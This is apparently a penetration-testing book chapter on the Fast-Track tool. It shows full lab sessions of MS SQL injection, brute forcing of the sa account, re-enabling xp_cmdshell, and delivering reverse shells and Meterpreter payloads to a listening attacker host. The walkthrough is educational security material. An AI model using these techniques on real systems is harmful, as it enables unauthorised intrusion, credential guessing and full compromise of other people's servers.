Fast-Track is an open source Python-based tool for augmenting advanced penetration testing techniques. Fast-Track uses the Metasploit Framework for payload delivery and client-side attack vectors. It complements Metasploit by adding additional features, including Microsoft SQL attacks, more exploits, and browser attack vectors. Fast-Track was created by Dave Kennedy, with contributions from Andrew Weidenhamer, John Melvin, and Scott White. It is currently updated and maintained by Joey Furr (j0fer).
Fast-Track’s interactive mode is the way to use it. To enter interactive mode, as shown below, use ./fast-track.py -i
(which is similar to the command used by SET). By issuing different options and sequences, you can customize your attack, targets, and more. (You can also use ./fast-track.py -g
to load the web interface.)
oot@bt4:/pentest/exploits/fasttrack# ./fast-track.py -i
***********************************************
******* Performing dependency checks... *******
***********************************************
*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***
*** PyMills is installed. (Check) ***
Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.
Your system has all requirements needed to run Fast-Track!
Fast-Track Main Menu:
Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
1. Fast-Track Updates
2. Autopwn Automation
3. Microsoft SQL Tools
4. Mass Client-Side Attack
5. Exploits
6. Binary to Hex Payload Converter
7. Payload Generator
8. Fast-Track Tutorials
9. Fast-Track Changelog
10. Fast-Track Credits
11. Exit
Enter the number:
You can see the general categories of attacks and features in Fast-Track’s main menu above though we’ll only cover selected ones in this chapter. We’ll explore some of the most useful tricks, with an emphasis on exploiting Microsoft SQL. For example, the Autopwn Automation menu simplifies the process of Metasploit’s autopwn functionality—simply enter the IP address, and Fast-Track sets up everything for you. The Exploits menu contains additional exploits not included in Metasploit.
SQL injection (SQLi) attacks piggyback SQL commands to assault web applications by exploiting insecure code. A SQL query can be inserted into the backend database via a trusted web server to execute commands on the database. Fast-Track automates the process of performing advanced SQL injection attacks by focusing on query string and POST parameters within web applications. The following attack relies on the attacker knowing that SQL injection is present on the target website, and also knowing which parameter is vulnerable. This attack will work only on MS SQL–based systems.
Begin the setup for the attack by selecting Microsoft SQL Tools
from the main menu and then MSSQL Injector
, as shown below.
Pick a list of the tools from below:
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
Enter your choice : 1
The simplest form of SQL injection is within the query string, typically sent in the URL field from the browser to the server. This URL string can often contain parameters that inform a dynamic site what information is being requested. Fast-Track distinguishes which field to attack by inserting an 'INJECTHERE
into the vulnerable query string parameter, like this:
http://www.secmaniac.com/index.asp?id='INJECTHERE&date=2011
When Fast-Track starts to exploit this vulnerability, it will look for the id
string in all fields to determine which field to attack. Let’s look at this in action by selecting the first option, Query String Parameter Attack
.
Enter which SQL Injector you want to use 1. SQL Injector - Query String Parameter Attack 2. SQL Injector - POST Parameter Attack 3. SQL Injector - GET FTP Payload Attack 4. SQL Injector - GET Manual Setup Binary Payload Attack Enter your choice:1
. . . SNIP . . .
Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectable parameter Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah Enter here:http://www.secmaniac.com/index.asp?id='INJECTHERE&date=2011
Sending initial request to enable xp_cmdshell if disabled... Sending first portion of payload (1/4)... Sending second portion of payload (2/4)... Sending third portion of payload (3/4)... Sending the last portion of the payload (4/4)... Running cleanup before executing the payload... Running the payload on the server...Sending initial request to enable xp_cmdshell if disabled... Sending first portion of payload (1/4)... Sending second portion of payload (2/4)... Sending third portion of payload (3/4)... Sending the last portion of the payload (4/4)... Running cleanup before executing the payload... Running the payload on the server... listening on [any] 4444 ... connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>
Success! Full access was granted to the system, all through SQL injection.
Note that this attack will not succeed if parameterized SQL queries or stored procedures are in use. Note, too, that the required configuration for this attack is very minimal. After selecting SQL Injector - Query String Parameter Attack
from the menu of attacks, you simply direct Fast-Track to the point of SQL injection . If the xp_cmdshell
stored procedure is disabled, Fast-Track will automatically re-enable it and attempt privilege escalation of MS SQL.
Fast-Track’s POST parameter attack requires even less configuration than the preceding query string parameter attack. For this attack, simply pass Fast-Track the URL of the website you want to attack, and it will automatically detect the form to attack.
Enter which SQL Injector you want to use 1. SQL Injector - Query String Parameter Attack 2. SQL Injector - POST Parameter Attack 3. SQL Injector - GET FTP Payload Attack 4. SQL Injector - GET Manual Setup Binary Payload Attack Enter your choice:2
This portion allows you to attack all forms on a specific website without having to specify each parameter. Just type the URL in, and Fast-Track will auto SQL inject to each parameter looking for both error based injection as well as blind based SQL injection. Simply type the website you want to attack, and let it roll. Example: http://www.sqlinjectablesite.com/index.aspx Enter the URL to attack:http://www.secmaniac.com
Forms detected...attacking the parameters in hopes of exploiting SQL Injection.. Sending payload to parameter: txtLogin Sending payload to parameter: txtPassword [-] The PAYLOAD is being delivered. This can take up to two minutes. [-] listening on [any] 4444 ... connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>
As you can see, Fast-Track handled the automatic detection of the POST parameters and injected the attack, completely compromising the affected system via SQL injection.
You can also use FTP to deliver your payload, although FTP is generally blocked on outbound-based connections.
If you have a different IP address listening for the reverse shell or you need to fine-tune some of the configuration settings, you can set up the injector manually.
Enter which SQL Injector you want to use 1. SQL Injector - Query String Parameter Attack 2. SQL Injector - POST Parameter Attack 3. SQL Injector - GET FTP Payload Attack 4. SQL Injector - GET Manual Setup Binary Payload Attack Enter your choice:4
The manual portion allows you to customize your attack for whatever reason. You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE So for example, when the tool asks you for the SQL Injectable URL, type: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah Enter here:http://www.secmaniac.com/index.asp?id=
'INJECTHERE&date=2010
Enter the IP Address of server with NetCat Listening:10.211.55.130
Enter Port number with NetCat listening:9090
Sending initial request to enable xp_cmdshell if disabled.... Sending first portion of payload.... Sending second portion of payload.... Sending next portion of payload... Sending the last portion of the payload... Running cleanup... Running the payload on the server... listening on [any] 9090 ... 10.211.55.128: inverse host lookup failed: Unknown server error : Connection timed out connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1045 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>
First choose the manual option at . Then, as in the query string parameter attack, point Fast-Track to the parameter vulnerable to SQL injection and input your listening IP address at along with the port you want your target to connect to at . Fast-Track takes care of the rest.
Perhaps one of the best aspects of Fast-Track is the MSSQL Bruter (available from the Microsoft SQL Attack Tools menu). When MS SQL is installed, MSSQL Bruter can use integrated Windows authentication, SQL authentication, or mixed-mode authentication.
Mixed-mode authentication allows users to be verified from Windows authentication as well as directly from the MS SQL Server. If mixed-mode or SQL authentication is used during the installation of MS SQL, the administrator installing the software needs to specify an sa, or system administrator, account for MS SQL. Often, administrators choose a weak, blank, or easily guessable password that can be used to an attacker’s advantage. If the sa account can be brute forced, it will lead to a compromise of the entire system through the extended stored procedure xp_cmdshell
.
Fast-Track uses a few methods for discovery when looking for MS SQL servers, including using nmap to perform port scans of the default MS SQL TCP port 1433. If the target machine is using MS SQL Server 2005 or later, dynamic port ranges can be used, which makes it more difficult to enumerate, but Fast-Track directly interfaces with Metasploit and can look for port 1434 User Datagram Protocol (UDP) to reveal which port MS SQL server’s dynamic port is running.
Once Fast-Track has identified a server and successfully brute forced the sa account, it will use advanced binary-to-hex conversion methods to deliver a payload. This attack is usually highly successful, especially in large environments where MS SQL is widely used.
Microsoft SQL Attack Tools
Pick a list of the tools from below:
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
Enter your choice : 2
Enter the IP Address and Port Number to Attack.
Options: (a)ttempt SQL Ping and Auto Quick Brute Force
(m)ass scan and dictionary brute
(s)ingle Target (Attack a Single Target with big dictionary)
(f)ind SQL Ports (SQL Ping)
(i) want a command prompt and know which system is vulnerable
(v)ulnerable system, I want to add a local admin on the box...
(e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
After we select the MSSQL Bruter
option, Fast-Track presents us with a list of various attacks that can be conducted. Not all of these will work in every situation, or even serve the same purpose, so it is important to be sure that you understand what is happening for each option.
Fast-Track has several options:
Attempt SQL Ping and Auto Quick Brute Force attempts to scan a range of IP addresses using the same syntax as nmap and a built-in predefined dictionary list of about 50 passwords.
Mass scan and dictionary brute scans a range of IP addresses and allows you to specify a word list of your own. Fast-Track comes with a decent word list located at bin/dict/wordlist.txt.
Single Target allows you to brute force one specific IP address with a large word list.
Find SQL Ports (SQL Ping) only looks for SQL servers and will not attack them.
I want a command prompt . . . spawns a command prompt for you if you already know the sa password.
Vulnerable system . . . adds a new administrative user on a box that you know to be vulnerable.
Enable xp_cmdshell
. . . is a stored procedure Fast-Track uses to execute underlying system commands. By default, it is disabled in SQL Server versions 2005 and later, but Fast-Track can automatically re-enable it. When attacking a remote system with any option, Fast-Track will automatically attempt to re-enable xp_cmdshell
, just in case.
You can use and customize several options to reach your target, the easiest of which is the quick brute force, which will often go undetected. We’ll select the quick brute force option using a subset of built-in passwords and attempt to guess the password on the MS SQL server.
Enter the IP Address and Port Number to Attack. Options: (a)ttempt SQL Ping and Auto Quick Brute Force (m)ass scan and dictionary brute (s)ingle Target (Attack a Single Target with big dictionary) (f)ind SQL Ports (SQL Ping) (i) want a command prompt and know which system is vulnerable (v)ulnerable system, I want to add a local admin on the box... (e)nable xp_cmdshell if its disabled (sql2k and sql2k5) Enter Option:a
Enter username for SQL database (example:sa):sa
Configuration file not detected, running default path. Recommend running setup.py install to configure Fast-Track. Setting default directory... Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255):10.211.55.1/24
Do you want to perform advanced SQL server identification on non-standard SQL ports? This will use UDP footprinting in order to determine where the SQL servers are at. This could take quite a long time. Do you want to perform advanced identification, yes or no:yes
[-] Launching SQL Ping, this may take a while to footprint.... [-] [*] Please wait while we load the module tree... Brute forcing username: sa Be patient this could take awhile... Brute forcing password of password2 on IP 10.211.55.128:1433 Brute forcing password of on IP 10.211.55.128:1433 Brute forcing password of password on IP 10.211.55.128:1433 SQL Server Compromised: "sa" with password of: "password" on IP 10.211.55.128:1433 Brute forcing password of sqlserver on IP 10.211.55.128:1433 Brute forcing password of sql on IP 10.211.55.128:1433 Brute forcing password of password1 on IP 10.211.55.128:1433 Brute forcing password of password123 on IP 10.211.55.128:1433 Brute forcing password of complexpassword on IP 10.211.55.128:1433 Brute forcing password of database on IP 10.211.55.128:1433 Brute forcing password of server on IP 10.211.55.128:1433 Brute forcing password of changeme on IP 10.211.55.128:1433 Brute forcing password of change on IP 10.211.55.128:1433 Brute forcing password of sqlserver2000 on IP 10.211.55.128:1433 Brute forcing password of sqlserver2005 on IP 10.211.55.128:1433 Brute forcing password of Sqlserver on IP 10.211.55.128:1433 Brute forcing password of SqlServer on IP 10.211.55.128:1433 Brute forcing password of Password1 on IP 10.211.55.128:1433. . . SNIP . . .
******************************************* The following SQL Servers were compromised: ******************************************* 1. 10.211.55.128:1433 *** U/N: sa P/W: password *** ******************************************* To interact with system, enter the SQL Server number. Example: 1. 192.168.1.32 you would type 1 Enter the number:
After selecting Attempt SQL Ping and Auto Quick Brute Force at , you will be prompted for a SQL database username , followed by the range of IP addresses you want to scan at . Answer yes
when asked whether you want to perform advanced server identification . Although slow, this can be very effective.
The preceding output shows that Fast-Track successfully brute forced a system with the username of sa and password password. At this point, you can select the payload and compromise the system, as shown here.
Enter number here:1
Enabling: XP_Cmdshell... Finished trying to re-enable xp_cmdshell stored procedure if disabled. Configuration file not detected, running default path. Recommend running setup.py install to configure Fast-Track. Setting default directory... What port do you want the payload to connect to you on:4444
Metasploit Reverse Meterpreter Upload Detected.. Launching Meterpreter Handler. Creating Metasploit Reverse Meterpreter Payload.. Sending payload: c88f3f9ac4bbe0e66da147e0f96efd48dad6 Sending payload: ac8cbc47714aaeed2672d69e251cee3dfbad Metasploit payload delivered.. Converting our payload to binary, this may take a few... Cleaning up... Launching payload, this could take up to a minute... When finished, close the metasploit handler window to return to other compromised SQL Servers. [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (718336 bytes) [*] Meterpreter session 1 opened (10.211.55.130:4444 -> 10.211.55.128:1030) meterpreter >
You should now have full access to the machine using the Meterpreter payload.
SQLPwnage is a mass brute force attack that can be used against web applications in an attempt to find Microsoft SQL injection. SQLPwnage will scan subnets for web servers on port 80, crawl websites, and attempt to fuzz post parameters until it finds SQL injection. It supports both error- and blind-based SQL injection and will handle everything from privilege escalation to re-enabling the xp_cmdshell
stored procedure, bypassing the Windows debug 64KB restriction, and dropping any payload you want onto the system.
Begin the configuration for this attack by selecting Microsoft SQL Tools
from the Fast-Track main menu, followed by SQLPwnage
, option 2, as shown below.
SQLPwnage Main Menu: 1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND) 2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED) 3. SQL Injection single URL exploitation Enter your choice:2
. . . SNIP . . .
Scan a subnet or spider single URL? 1. url 2. subnet (new) 3. subnet (lists last scan) Enter the Number:2
Enter the ip range, example 192.168.1.1-254:10.211.55.1-254
Scanning Complete!!! Select a website to spider or spider all?? 1. Single Website 2. All Websites Enter the Number:2
Attempting to Spider: http://10.211.55.128 Crawling http://10.211.55.128 (Max Depth: 100000) DONE Found 0 links, following 0 urls in 0+0:0:0 Spidering is complete. ************************************************************************* http://10.211.55.128 ************************************************************************* [+] Number of forms detected: 2 [+] A SQL Exception has been encountered in the "txtLogin" input field of the above website.
Depending on whether the website presents an error when SQL injection attempts are made, you will need to choose between BLIND
and ERROR BASED
attacks. At we choose ERROR BASED
because the site is kind enough to report back error messages when it has trouble executing a SQL query.
Next, choose either to spider a single URL or to scan a complete subnet . After scanning the subnet, we choose to attack all the sites Fast-Track found . As you can see, scanning all the sites found a vulnerable form on one site.
The final configuration steps require that you select a payload. In the following example, you select Metasploit Meterpreter Reflective Reverse TCP
along with the port at that you want your attacking machine to listen on. After Fast-Track has successfully exploited the SQL injection vulnerability, it sends a chunked payload to the target and eventually presents you with your Meterpreter shell .
What type of payload do you want? 1. Custom Packed Fast-Track Reverse Payload (AV Safe) 2. Metasploit Reverse VNC Inject (Requires Metasploit) 3. Metasploit Meterpreter Payload (Requires Metasploit) 4. Metasploit TCP Bind Shell (Requires Metasploit) 5. Metasploit Meterpreter Reflective Reverse TCP 6. Metasploit Reflective Reverse VNC Select your choice:5
Enter the port you want to listen on:9090
[+] Importing 64kb debug bypass payload into Fast-Track... [+] [+] Import complete, formatting the payload for delivery.. [+] [+] Payload Formatting prepped and ready for launch. [+] [+] Executing SQL commands to elevate account permissions. [+] [+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+] [+] Delivery Complete. [+] Created by msfpayload (http://www.metasploit.com). Payload: windows/patchupmeterpreter/reverse_tcp Length: 310 Options: LHOST=10.211.55.130,LPORT=9090 Launching MSFCLI Meterpreter Handler Creating Metasploit Reverse Meterpreter Payload.. Taking raw binary and converting to hex. Raw binary converted to straight hex. [+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]. . . SNIP . . .
Running cleanup before launching the payload.... [+] Launching the PAYLOAD!! This may take up to two or three minutes. [+] [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (718347 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1031) meterpreter >